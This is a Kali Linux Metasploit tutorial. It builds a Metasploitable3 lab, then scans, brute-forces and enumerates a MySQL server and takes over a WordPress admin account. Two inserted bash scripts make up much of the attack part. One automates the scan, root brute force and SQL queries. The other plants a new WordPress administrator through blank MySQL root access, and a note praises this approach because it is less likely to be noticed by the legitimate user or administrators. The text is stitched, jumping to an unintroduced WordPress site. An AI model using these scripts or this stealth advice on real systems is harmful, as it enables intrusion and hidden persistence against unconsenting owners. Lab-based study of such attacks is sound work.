How to Use Metasploit in Kali Linux

How to Use Metasploit in Kali Linux: A Step-By-Step Tutorial

Getting started with Metasploit can be challenging for new users. You may have trouble installing Metasploit as antivirus applications often flag it as malicious, and failing to install prerequisite software (e.g., PostgreSQL) will limit functionality.

This tutorial will help you bypass these pitfalls by teaching you how to use Metasploit in Kali Linux on a Virtual Machine (VM). On Kali, you’ll find Metasploit Framework pre-installed along with 600 other useful security tools. We’ll also help you set up a deliberately vulnerable system (Metasploitable3) with which to practice.

In this tutorial, we will cover:

  • Deploying a Kali Linux virtual machine with Metasploit pre-installed
  • Setting up a target in a virtual lab
  • A sample walkthrough against a vulnerable MySQL Server
  • Frequently Asked Questions (FAQ)

Without further ado, let’s get started!

Minimum System Requirements for Metasploit

Kali Linux (in its barebones state) can run on as little as 128MB of RAM and 2GB of disk space, but this isn’t sufficient to run Metasploit Framework. For that, the minimum system requirements are:

  • Processor: 2GHz+ processing power
  • Memory: 4GB of RAM (8GB is recommended)
  • Storage: 1GB of disk space (50GB is recommended)

Note: If you are installing Metasploit Framework as a stand-alone application on Windows, Linux, or macOS, antivirus software and host firewalls can interfere with installation and operation, because the framework ships exploit and payload code that matches their signatures. Add an exclusion for the installation directory, or disable the protection only for the duration of the install, rather than leaving it switched off.

How to Setup a Metasploit Virtual Lab Using Kali Linux and Metasploitable3

While it’s possible to install Metasploit Framework as a standalone application, the quickest (and easiest) way to get started with Metasploit is to use a Linux distribution it’s already present on, such as Kali Linux. 

We’ll use Metasploitable3, which includes an intentionally-vulnerable Windows Server 2008 R2 Virtual Machine (VM) for our target. To do this, we will download and install:

  • Oracle VirtualBox to host our VMs on a compatible Windows PC
  • Vagrant to provision our Metasploitable3 VMs (Windows Server 2008 R2)
  • The Kali Linux Virtual Appliance for VirtualBox

Download and Install VirtualBox

1. Download and install the latest version of VirtualBox using the Windows hosts link:


Follow the on-screen prompts to complete the installation. For a detailed explanation of the Setup Wizard options, you can refer to Chapter 2 of the VirtualBox manual.

2. Once installed, you’ll see Oracle VM VirtualBox in your Start menu; click it to launch the VirtualBox application.
3. We’ll also need to download and install the Oracle VM VirtualBox Extension Pack, as it is required to run the Kali Linux virtual appliance:

4. Running the file will prompt you with a warning. Click Install to proceed:

5. After reading the license terms, click I Agree to proceed:

6. When completed, you’ll receive a notice indicating that the installation was successful.

Click OK to close the window:

Install Vagrant and Provision the Metasploitable3 VMs

Rapid7 (the developers of Metasploit and Metasploitable) uses an open-source tool called Vagrant to provide their pre-built Metasploitable3 images. In the instructions below, we will:

  • Install Vagrant
  • Pull down Rapid7’s Vagrant configuration file, “Vagrantfile,” from their GitHub repository
  • Deploy the Metasploitable3 VMs using Vagrant

The configuration file (i.e., the “Vagrantfile”) provisions two Metasploitable3 VM images, Ubuntu 14.04 and Windows Server 2008 R2; we’ll be using the latter. Together these VMs require 65GB of storage and 4.5GB of RAM, so be sure you have sufficient resources before deploying them.

Note: The Windows Server 2008 R2 operating system uses a trial license, which may have expired on the provisioned VM. The VM will shut down every 1-2 hours if the trial has expired, so you’ll either want to rebuild the VM or give it a license key (if you have one).

  1. We’ll need to download and install the latest version of Vagrant to provision Metasploitable3 VMs:

Note: “686” (i686) refers to the 32-bit version. We’ll be using “Amd64”, the 64-bit version. The installation will require a reboot!

After downloading the installation package, simply run it and follow the prompts to complete the installation. The product documentation (found here) can help you answer any questions about installation or compatibility.

  2. With VirtualBox and Vagrant installed, we can pull down the Metasploitable3 VMs. To do this, open PowerShell as an administrator and create a new staging folder (I chose "D:\Temp" for this demonstration).

    a. Run the following command from that folder to pull down the Vagrant deployment script for the Metasploitable3 VMs from the GitHub repository:

    Invoke-WebRequest -Uri "https://raw.githubusercontent.com/rapid7/metasploitable3/master/Vagrantfile" -OutFile "Vagrantfile"

    b. Then run vagrant up (in the folder containing the Vagrantfile) to download and provision the Metasploitable3 VMs. The Vagrantfile names the two machines ub1404 and win2k8; giving vagrant up only the name win2k8 builds just the Windows Server 2008 R2 VM used in this tutorial and skips the Ubuntu download:

  3. For your VMs to be on the same network as your host, configure their network adapters to run in “bridged” mode (i.e., the virtual network adapter behaves as though it were plugged into the same physical network as the VM host). You can do this by clicking Settings > Network and selecting Bridged Adapter. Bear in mind that bridged mode also exposes the deliberately vulnerable Metasploitable3 VM to every other device on that network, so only use it on a trusted lab network; if Kali and the target merely need to reach each other, a Host-only Adapter or Internal Network gives the same result without that exposure:

Click OK to save the settings.

  4. You’ll need to log into the Windows Server 2008 R2 VM and verify its IP address. The default credentials are:
    • Username: vagrant
    • Password: vagrant
  5. Open Command Prompt and run ipconfig to verify the IP address (192.168.5.122 on my VM):

Your IP address will differ depending on the DHCP range used by your test environment’s network. Take note of this address as you’ll need it later.

We now have a Metasploitable3 VM running and ready to exploit! Next, we’ll need to download and configure our Kali Linux VM.

Download and Configure the Kali Linux Virtual Appliance for VirtualBox

Note: We will not need to download and install Metasploit Framework or its supporting tools (PostgreSQL, Nmap and so on), since they are already present on the Kali image.

1. Browse to https://www.kali.org/get-kali/#kali-platforms and select Virtual Machines from the list of available platforms:

2. We’ll choose the 64-bit (default) and select VirtualBox VM. Click the download button to download the file:

3. Once the Kali Linux virtual appliance file finishes downloading, you can import it into VirtualBox by opening the Oracle VM VirtualBox Manager and selecting File > Import Appliance…

4. Locate the downloaded Kali Linux virtual appliance file and select Open, then click Next and finally Import:

You can monitor the import process using the display bar, which closes when completed.

5. You will now see both the Metasploitable3 VM(s) and the Kali Linux VM in your list:

Before we launch Kali, we’ll want to configure the VM’s network adapter in bridged mode, just as we did for our Metasploitable3 Windows Server 2008 R2 VM (see step 3 of the previous section).

6. Select the Kali Linux VM from the list and click Start to run the VM:

Note: If your Kali Linux appliance failed to launch, this could be because you did not install the Oracle VM VirtualBox Extension Pack, which you can find here.

7. You can now login to the Kali Linux VM using the default credentials:

  • Username: kali
  • Password: kali

8. Before starting the Metasploit Framework console, we’ll want to verify that we have network connectivity from Kali Linux to the Metasploitable3 VM by pinging its IP address (the one we noted in Step 5 of the previous section). To do this, open a terminal session using CTRL+ALT+T, then ping the IP address of the Metasploitable3 server:

We are now ready to begin using Metasploit!

How to Use Metasploit in Kali Linux

  1. Click the Applications button in the upper left-hand corner of the screen (the Kali dragon icon on a blue background)
  2. As you begin to type “metasploit,” the search bar’s auto-complete will bring up the Metasploit Framework application:

The shortcut launches a terminal window and runs the following command:

sudo msfdb init && msfconsole

To understand what this is doing, we can break the command down into three parts:

  1. In Unix-like operating systems such as Linux, ‘sudo’ runs the command that follows it with elevated permissions. Here it applies only to ‘msfdb init’, which needs root to manage the PostgreSQL service; ‘msfconsole’ itself runs as your regular user.
  2. The command ‘msfdb init’ starts the PostgreSQL service, checks whether a database exists for Metasploit, and if not, creates it (along with the database user and connection configuration the console reads).
  3. Lastly, ‘&&’ runs the subsequent command ‘msfconsole’ only if the preceding command (‘msfdb init’) exited successfully, launching the Metasploit Framework Console.


The console displays one of several random banners upon launch:

You can display a different banner at any time with the banner command, or, if you’re launching Metasploit from a terminal window, you can include the -q switch (e.g., msfconsole -q) to prevent a banner from displaying on launch.

Before you begin, run the ‘db_status’ command to verify that the PostgreSQL service is running and that the Metasploit Framework database is initialized:

Note: If it doesn’t display “Connected to msf,” ensure that the PostgreSQL service is started (e.g., open a terminal window and type sudo service postgresql start, or check with msfdb status), then rerun msfdb init.

How to Use the Metasploit Framework Console

The Metasploit Framework Console (msfconsole) is a command-line interface (CLI) for finding, configuring and running modules (self-contained pieces of code that each perform one task). Modules fall into several categories; the three that matter for this tutorial are:

  • Auxiliary: modules that scan, fingerprint or brute-force a target without delivering a payload, such as the TCP Port Scanner and MySQL Login Scanner used in the walkthrough below (which uses auxiliary modules only).
  • Exploits: modules that take advantage of a specific vulnerability in a target service in order to execute a payload on it.
  • Payloads: the code an exploit runs on the target once it succeeds, for example a command shell or a Meterpreter session.

To get started, enter help to view a list of commands:

Some other useful commands include:

  • search – looks up modules by name, description, CVE number, etc.
  • use – loads a module by full path or by index number from the latest search results
    • options – displays the options of the loaded module and their current values
    • set – configures an option of the loaded module
    • run – runs the loaded module
  • back – leaves the loaded module and returns to the main prompt
  • exit – quits the console

In the walkthrough below, we’ll provide detailed examples of how to use these commands.


Metasploit Walkthrough: Exploiting MySQL

Now that we have set up our virtual lab, verified connectivity, and covered some basic concepts and commands, let’s step through a sample MySQL exploit.

MySQL Service Discovery

We’ll want to use a port scanner to understand what ports are open on our target. While Kali Linux comes pre-packaged with several port scanning tools, we can also see which ones are available in the Metasploit Framework console using the search command (e.g., search portscan):

The keyword in the search is highlighted. Number 5, auxiliary/scanner/portscan/tcp, looks promising, so let’s use the info command to get additional information (i.e., info 5). Note that these index numbers refer to the most recent search results and will differ between Metasploit versions, so when writing anything down, use the full module path instead:

Having read the description, we know that this module is suitable for our purposes, so we’ll enter use 5 (equivalently, use auxiliary/scanner/portscan/tcp) to load the “TCP Port Scanner” module:

Note that the prompt has changed to “msf6 auxiliary(scanner/portscan/tcp) >”, indicating that the “TCP Port Scanner” module is currently loaded.

Although the info command provided us with a list of available options, we can use the options command from within the module context to display their current configuration:

We can see that RHOSTS is the parameter for our target, so we’ll need to configure it using the set command (i.e., set RHOSTS 192.168.5.122)

If we enter options again, we can see that the RHOSTS parameter is set to our Metasploitable3 VM’s IP address:

The default port range for this scanner is 1-10,000. If left as-is, the scanner would eventually determine that port 3306 (MySQL) is open. For the sake of brevity, we’ll use the set command to narrow the PORTS option so the scanner checks only the MySQL port (set PORTS 3306):

With our options set, we can now use the run command to scan 192.168.5.122 on 3306:

Kali Linux also comes with several other port-scanning utilities, including Nmap, which we can use to interrogate port 3306 and learn more about the MySQL service running there, using the following command:

sudo nmap -sV -O 192.168.5.122 -p3306

  • sudo nmap runs Nmap with elevated permissions (required by the -O switch, described below, because OS detection needs raw packets)
  • -sV probes the target ports to determine the service running on each and its version (needed to judge whether the target runs an old, known-vulnerable version of a service; note that the version comes from the service’s own banner, so it can be wrong or deliberately hidden)
  • -O enables operating system detection (also useful, as the OS may have known vulnerabilities associated with it)
  • 192.168.5.122 is the IP address of our target
  • -p3306 specifies the port(s) we want to scan (we chose port 3306 since we know the target is listening on it)

Our Nmap scan confirms that MySQL is running on the target and reports version 5.5.20. You can also use the search command to look for a Metasploit module that determines the MySQL version (e.g., search type:auxiliary mysql):

Looking at the list above, number 11 (auxiliary/scanner/mysql/mysql_version) is the one we want. To select it, enter use 11 (or use auxiliary/scanner/mysql/mysql_version, which does not depend on the search index):

If we look at the options for this module, we can see that it requires a target host (RHOSTS). We’ll set this to 192.168.5.122, verify the settings with the options command again and then run the module:

Bruteforcing the MySQL Root Account

Now that we’ve confirmed MySQL’s version and port number, we can attempt to connect to the instance and bruteforce the root password using the auxiliary/scanner/mysql/mysql_login module (e.g., use auxiliary/scanner/mysql/mysql_login) :


We’ll review the list of options, then set RHOSTS to 192.168.5.122. This module also accepts a password wordlist; we’ll use /usr/share/wordlists/rockyou.txt, but first we need to decompress it. The archive sits in a root-owned directory, so open a terminal session (CTRL+ALT+T) and run the following with sudo: sudo gunzip /usr/share/wordlists/rockyou.txt.gz

Going back to the Metasploit session, we can use “set PASS_FILE /usr/share/wordlists/rockyou.txt” to define the wordlist path and run the module:


The output indicates that the root account accepts a blank password.

Enumerating Data From MySQL

In cyber security, “enumeration” is the systematic extraction of information from a target (here, the accounts, privileges and configuration of a compromised service) in order to decide what to attack next.

We can load the MySQL Enumeration Module (auxiliary/admin/mysql/mysql_enum) to retrieve a list of the MySQL accounts and their privileges:


MySQL Exploitation

As we can see from the MySQL enumeration results, root access lets us read or change any data held by the MySQL server. We can use the “MySQL SQL Generic Query” module (auxiliary/admin/mysql/mysql_sql) to run SQL statements on the target server:

We’ll set USERNAME to root, RHOSTS to 192.168.5.122 and SQL to show databases, confirm our options and run the module:


This gives us a list of the databases on the server, but it is tedious to work with, since you have to update the SQL option and rerun the module for every query. Instead, we’ll connect directly to the MySQL instance with the MySQL client, using the root account and its blank password, in a new terminal session (CTRL+ALT+T):

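The msfconsole steps above, from the port scan through the generic SQL query, can be replayed from a single Metasploit resource script rather than typed one at a time. The following is an added example, not part of the original article: a shell script for the Kali terminal that writes such a resource script for a given target and hands it to msfconsole -q -r. It assumes the target address and wordlist path used in this tutorial, and it sets BLANK_PASSWORDS and STOP_ON_SUCCESS on the login scanner so a blank root password is reported immediately rather than after a pass through rockyou. The file name mysql-recon.rc and the positional arguments are my choices, not anything the page or the modules define.

```bash
#!/usr/bin/env bash
# Added example (not from the original article): replay the msfconsole
# steps of the MySQL walkthrough from a Metasploit resource script.
# Assumptions: target and wordlist default to the values used in the
# tutorial; option names are those of the current msf6 modules.
set -eu

RHOST="${1:-192.168.5.122}"
PASS_FILE="${2:-/usr/share/wordlists/rockyou.txt}"
MYSQL_PASS="${3:-}"          # leave empty until mysql_login reports one
RC="${TMPDIR:-/tmp}/mysql-recon.rc"

# Print the resource script for one target.  Each "run" blocks until the
# module finishes, so the steps execute in order and their results are
# recorded in the database that db_status confirmed earlier.
write_msf_rc() {
    local rhost="$1" pass_file="$2" pass="${3:-}"
    cat <<EOF
db_status
use auxiliary/scanner/portscan/tcp
set RHOSTS ${rhost}
set PORTS 3306
run
use auxiliary/scanner/mysql/mysql_version
set RHOSTS ${rhost}
run
use auxiliary/scanner/mysql/mysql_login
set RHOSTS ${rhost}
set USERNAME root
set BLANK_PASSWORDS true
set STOP_ON_SUCCESS true
set PASS_FILE ${pass_file}
run
use auxiliary/admin/mysql/mysql_enum
set RHOSTS ${rhost}
set USERNAME root
EOF
    # PASSWORD left at its default means a blank password; only set it
    # when the login scan found something else.
    if [ -n "$pass" ]; then printf 'set PASSWORD %s\n' "$pass"; fi
    cat <<EOF
run
use auxiliary/admin/mysql/mysql_sql
set RHOSTS ${rhost}
set USERNAME root
EOF
    if [ -n "$pass" ]; then printf 'set PASSWORD %s\n' "$pass"; fi
    cat <<EOF
set SQL show databases
run
services -p 3306
exit
EOF
}

write_msf_rc "$RHOST" "$PASS_FILE" "$MYSQL_PASS" > "$RC"

# The login scanner needs the decompressed wordlist; warn before wasting a run.
if [ ! -r "$PASS_FILE" ]; then
    echo "warning: $PASS_FILE missing; on Kali run: sudo gunzip /usr/share/wordlists/rockyou.txt.gz" >&2
fi

if command -v msfconsole >/dev/null 2>&1; then
    msfconsole -q -r "$RC"      # -q: no banner, -r: replay the resource script
else
    echo "msfconsole not found; resource script written to $RC" >&2
fi
```

Run it as ./mysql-recon.sh 192.168.5.122, and pass the password as a third argument if the login scan turns up a non-blank one. Because every module run is recorded in the database, the closing services -p 3306 prints what the scan learned about the target, which is the payoff for the db_status check made earlier.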
I’d like to gain access to that WordPress application, so let’s change the admin password to something we know (e.g., MyNewPassword123!):

Lastly, let’s try logging in to the WordPress web application using the newly reset admin password:

This works, as we can log in successfully using the reset credentials:

Note: An alternative (read: better) option would be to use our MySQL root access to create a new administrator account on any application we wanted to compromise. Changing an existing password (or other destructive behaviour) locks the legitimate user out and is therefore far more likely to be noticed and reported by that user or a systems administrator, whereas an extra account only stands out to someone who reviews the user list.

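The alternative the note recommends, written out as an added example that is not part of the original article: a shell script for the Kali terminal that uses the blank root password to connect with the MySQL client directly (the same direct connection used above to change the admin password) and inserts a new WordPress administrator instead of touching the existing one. The database name wordpress, the wp_ table prefix, the account name auditor and the example password are assumptions, so confirm the first two with SHOW DATABASES and SHOW TABLES before running it against the target; the wp_users and wp_usermeta rows and the serialized capability string are standard WordPress, and WordPress accepts a plain MD5 user_pass and re-hashes it on the first successful login. The script only prints the SQL unless RHOST is set, so it can be reviewed before anything reaches the target.

```bash
#!/usr/bin/env bash
# Added example (not from the original article).  With a blank MySQL root
# password, connect directly and add a WordPress administrator instead of
# overwriting the existing admin's password.
# Assumptions not stated on the page: database "wordpress", table prefix
# "wp_", and the account name/password below.  Confirm the database and
# prefix with SHOW DATABASES / SHOW TABLES first.
set -eu

RHOST="${RHOST:-}"                          # e.g. RHOST=192.168.5.122; unset = dry run
WP_DB="${WP_DB:-wordpress}"
NEW_USER="${NEW_USER:-auditor}"
NEW_PASS="${NEW_PASS:-MyNewPassword123!}"   # hypothetical, mirrors the page's example

# Accept only characters that cannot terminate the quoted SQL literals
# built below, so a stray quote cannot break (or alter) our own statement.
safe_literal() {
    case "$1" in
        ''|*[!A-Za-z0-9_@.!-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Print the SQL that creates an administrator for the given table prefix.
# WordPress still accepts an MD5 hash in user_pass (it upgrades the hash
# on the first successful login), so MD5() is enough to log in.  The
# capabilities meta key carries the table prefix, as WordPress expects.
wp_admin_sql() {
    local user="$1" pass="$2" prefix="${3:-wp_}"
    safe_literal "$user" && safe_literal "$pass" || return 1
    cat <<EOF
INSERT INTO ${prefix}users
  (user_login, user_pass, user_nicename, user_email, user_registered, user_status, display_name)
VALUES
  ('${user}', MD5('${pass}'), '${user}', '${user}@example.com', NOW(), 0, '${user}');
SET @uid = LAST_INSERT_ID();
INSERT INTO ${prefix}usermeta (user_id, meta_key, meta_value)
  VALUES (@uid, '${prefix}capabilities', 'a:1:{s:13:"administrator";b:1;}');
INSERT INTO ${prefix}usermeta (user_id, meta_key, meta_value)
  VALUES (@uid, '${prefix}user_level', '10');
EOF
}

if [ -z "$RHOST" ]; then
    echo "RHOST not set; printing the SQL instead of running it:" >&2
    wp_admin_sql "$NEW_USER" "$NEW_PASS"
else
    # No -p: the client sends an empty password, matching mysql_login's result.
    mysql -h "$RHOST" -u root -e 'SHOW DATABASES;'
    wp_admin_sql "$NEW_USER" "$NEW_PASS" | mysql -h "$RHOST" -u root "$WP_DB"
    mysql -h "$RHOST" -u root "$WP_DB" \
        -e "SELECT ID, user_login FROM wp_users WHERE user_login = '${NEW_USER}';"
fi
```

Run it once without RHOST to inspect the statements, then with RHOST=192.168.5.122 to apply them; the final SELECT confirms the row exists, after which the new account logs in through the normal WordPress login page while the existing admin's password is left alone.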
Conclusion

In this tutorial, we described how to set up a virtual lab using Kali Linux and Metasploitable3, explained the basics of Metasploit Framework, and demonstrated an attack against a vulnerable MySQL Database Server running on Windows Server 2008 R2.

The information and examples provided in this tutorial only scratch the surface of what you can do with Kali Linux and Metasploit Framework. To learn more about this and other penetration testing tools, consider checking out StationX’s Complete Ethical Hacker Course.

Frequently Asked Questions
